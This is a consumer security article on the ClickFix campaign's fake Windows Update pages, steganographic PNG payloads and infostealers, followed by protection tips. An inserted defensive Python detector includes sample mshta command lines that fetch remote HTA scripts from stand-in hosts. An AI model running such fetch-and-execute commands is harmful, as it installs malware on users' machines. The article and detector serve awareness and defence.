Cybercriminals continue to get better at infiltrating the software you use every day.
Over the past few years, we've seen phishing pages that replicate banking portals, fake browser alerts that claim your device is infected, and "human verification" screens that trick you into running commands you should never touch. The latest twist comes from the current ClickFix campaign.
Instead of asking you to prove that you are a human, attackers now masquerade as Windows Update. It looks convincing enough that you might follow the instructions without thinking, which is exactly what they want.
Malware lurks inside seemingly ordinary image files, using steganography to bypass traditional security tools. (Microsoft)
How a fake update works
Researchers have noticed that ClickFix has updated its old trick. Previously, the campaign relied on human verification pages, but now you get a full-screen Windows update screen that looks almost identical to the real thing. Joe Security showed how the page displays fake progress bars, familiar update messages, and a prompt to perform a critical security update.
If you're using Windows, the site will prompt you to open a Run window and paste in something from your clipboard. That "something" is a command that automatically downloads a malware dropper. The final payload is usually an infostealer that steals passwords, cookies, and other data from your computer.
Fake update screens are becoming increasingly difficult to detect as attackers imitate Windows with near-perfect accuracy. (Joe Security)
The moment you paste the command, the chain of infection begins. First, a file named mshta.exe contacts a remote server and retrieves a script. To avoid detection, these URLs often hex-encode parts of the address and change their paths. The script then runs obfuscated PowerShell code filled with unnecessary instructions to frustrate researchers. Once that is done, PowerShell decrypts a hidden .NET assembly that acts as a loader.
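For defenders, the first stage described above leaves a recognizable command line. The following is an added example, not code from the article or from Joe Security: it flags mshta.exe started with a remote URL and decodes a hex-encoded IPv4 host. The command lines are constructed samples, and the assumption is that real input would come from process-creation logs.

```python
import re

# Constructed sample command lines (not taken from a real incident).
SAMPLE_COMMANDS = [
    r'mshta.exe http://0xcb.0x00.0x71.0x05/a1/update',   # hex-encoded IPv4 host
    r'"C:\Windows\System32\mshta.exe" https://example.invalid/verify.hta',
    r'mshta.exe C:\Tools\inventory.hta',                  # local HTA, no URL
    r'notepad.exe C:\Users\kim\notes.txt',
]

URL_RE = re.compile(r'https?://([^/\s"\']+)', re.IGNORECASE)
MSHTA_RE = re.compile(r'(^|[\\/"\s])mshta(\.exe)?(["\s]|$)', re.IGNORECASE)
HEX_OCTET_RE = re.compile(r'^0x[0-9a-f]{1,2}$', re.IGNORECASE)


def decode_hex_host(host):
    """Return dotted-decimal IPv4 if every label is a hex octet, else None."""
    labels = host.split(':')[0].split('.')  # drop an optional :port
    if len(labels) == 4 and all(HEX_OCTET_RE.match(l) for l in labels):
        return '.'.join(str(int(l, 16)) for l in labels)
    return None


def assess(cmdline):
    """Return the reasons a command line matches the first stage of the chain."""
    reasons = []
    if not MSHTA_RE.search(cmdline):
        return reasons
    match = URL_RE.search(cmdline)
    if match:
        reasons.append('mshta launched with remote URL')
        decoded = decode_hex_host(match.group(1))
        if decoded:
            reasons.append('hex-encoded host decodes to ' + decoded)
    return reasons


def scan(commands):
    """Map each suspicious command line to its list of reasons."""
    return {c: r for c in commands if (r := assess(c))}


if __name__ == '__main__':
    for cmd, why in scan(SAMPLE_COMMANDS).items():
        print(cmd, '->', '; '.join(why))
```
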
Why is this attack so difficult to detect?
The loader hides the next step inside a regular PNG file. ClickFix uses a special form of steganography, a technique that hides secret data inside normal-looking content. In this case, the malware resides within the pixel data of the image. Attackers tweak color values in certain pixels, especially the red channel, to embed snippets of shellcode. When you view the image, everything looks fine.
The script knows exactly where the hidden data is. It extracts the pixel values, decrypts them, and rebuilds the malware directly in memory. This means that nothing obvious is written to the disk. Security tools that rely on file scanning miss this because the shellcode never appears as a separate file.
After the rebuild, the shellcode is injected into a trusted Windows process, such as explorer.exe. The attack uses familiar in-memory techniques such as VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread. Recent ClickFix activity has installed infostealers such as LummaC2 and updated versions of Rhadamanthys. These tools are designed to collect credentials and send them to the attacker with minimal noise.

Once the hidden code is loaded into a trusted Windows process, the data stealers quietly begin to collect your data. (Kurt “CyberGuy” Knutsson)
7 Steps You Can Take to Protect Yourself from the ClickFix Campaign
The best way to stay protected is to slow down for a moment and take a few steps that will prevent these attacks before they start.
1) Never run commands you didn't ask for
If any site prompts you to paste a command into Run, PowerShell, or Terminal, take it as an immediate warning sign. Real operating system updates never require you to run commands from a web page. By executing this command, you give full control to the attacker. If something doesn't seem right, close the page and don't interact again.
2) Keep Windows updates inside Windows.
Updates should only come from the Windows Settings app or through official system notifications. A browser tab or pop-up window pretending to be a Windows update is always a fake. If you see anything outside of the normal update flow that requires your action, ignore it and check the actual Windows Update page yourself.
3) Use a reliable antivirus.
Choose a security package that can detect threats both at the file level and in memory. Stealth attacks like ClickFix leave no obvious files for scanners to scan. Tools with behavioral detection, sandboxing, and script monitoring give you a much better chance of catching unusual activity early on.
The best way to protect yourself from malicious links that install malware and potentially access your personal information is to install powerful antivirus software on all your devices. This protection can also alert you to phishing emails and ransomware, keeping your personal information and digital assets safe.
4) Use a password manager
Password managers create strong and unique passwords for every account you use. They also autofill only on legitimate websites, which helps you detect fake login pages. If the manager refuses to enter your credentials, look at the URL again before entering anything manually.
Next, check whether your email has been exposed in past breaches. Our #1 best password manager includes a built-in breach scanner that checks to see if your email address or passwords have appeared in known breaches. If you find a match, immediately change any reused passwords and secure those accounts with new, unique credentials.
5) Use a personal data removal service
Many attacks begin by targeting emails and personal data already published on the Internet. Data removal services help reduce your digital footprint by requesting removal from data broker sites that collect and sell your information. They can't erase everything, but reducing your exposure means fewer attackers will have easy access to your data.
While no service can guarantee complete removal of your data from the internet, a data removal service is indeed a smart choice. They don't come cheap, and neither does your privacy. These services do all the work for you, actively monitoring and systematically removing your personal information from hundreds of websites. This is what gives me peace of mind and has proven to be the most effective way to erase your personal data from the internet. By limiting the information available, you reduce the risk that scammers will link leaked data to information they can find on the dark web, making it harder for them to target you.
6) Check URLs before trusting anything
A convincing layout does not mean a page is legitimate. Always look at the domain name first. If it doesn't match the official site or uses strange spelling or extra characters, close it. Attackers rely on people recognizing the page design but ignoring the address bar.
7) Close suspicious full-screen pages.
Fake update pages often run in full screen mode to hide the browser interface and make the page appear to be part of your computer. If the site suddenly goes into full screen mode without your permission, exit using Esc or Alt+Tab. Once you exit, scan your system and do not return to this page.
Kurt's Key Takeaway
ClickFix works because it relies on user interaction. Nothing will happen unless you follow the on-screen instructions. This makes the fake Windows update page especially dangerous because it uses something that most people trust. If you're used to Windows updates freezing on your screen, you may not question the prompt that appears during the process. Cybercriminals know this. They copy trusted interfaces to lower your guard, and then rely on you to execute the last command. The techniques that follow are complex, but the starting point is simple. They need your help.
Have you ever copied commands from a website without thinking twice about what they do? Let us know by writing to us at Cyberguy.com.
Copyright CyberGuy.com 2025. All rights reserved.






